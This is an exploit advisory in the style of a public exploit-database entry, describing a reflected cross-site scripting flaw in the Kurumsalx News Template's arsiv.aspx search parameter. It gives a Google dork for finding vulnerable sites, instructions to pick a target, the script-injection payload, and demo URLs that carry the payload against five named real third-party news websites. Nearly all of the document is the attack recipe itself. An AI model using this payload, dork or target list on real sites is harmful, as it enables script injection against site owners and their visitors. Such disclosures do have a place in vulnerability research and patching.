######################
# Exploit Title : Kurumsalx News Template Cross Site Scripting
# Exploit Author : MirSultan
# Vendor Homepage : http://www.kurumsalx.com
# Google Dork : intext:"Kurumsalx Haber sistemi"
# Date: 10.12.2018
# Contact: sultan.ahmir1997@yandex.com
######################
# Vulnerable File : /arsiv.aspx?page=1&kelime=
# Payload : "/></script><script>alert(/MirSultan/)</script>
# Describe : Search dork and select Target. Put /arsiv.aspx?page=1&kelime= After url such as :
# http://site.com/arsiv.aspx?page=1&kelime=
# Send data(Payload) with post method ... Ok
#
# Demo :
# http://haber.kurumsalx.com/arsiv.aspx?page=1&kelime="/></script><script>alert(/MirSultan/)</script>
# http://kayserihaber.com.tr/arsiv.aspx?page=1&kelime="/</script><script>alert(/MirSultan/)</script>
# http://sultansehirtv.com/arsiv.aspx?page=1&kelime="/></script><script>alert(/MirSultan/)</script>
# http://ysghaber.com/arsiv.aspx?page=1&kelime="/></script><script>alert(/MirSultan/)</script>
# http://merkezlife.com/arsiv.aspx?page=1&kelime="/></script><script>alert(/MirSultan/)</script>
#
######################
# discovered by : Batur-ı Mir Sultan
######################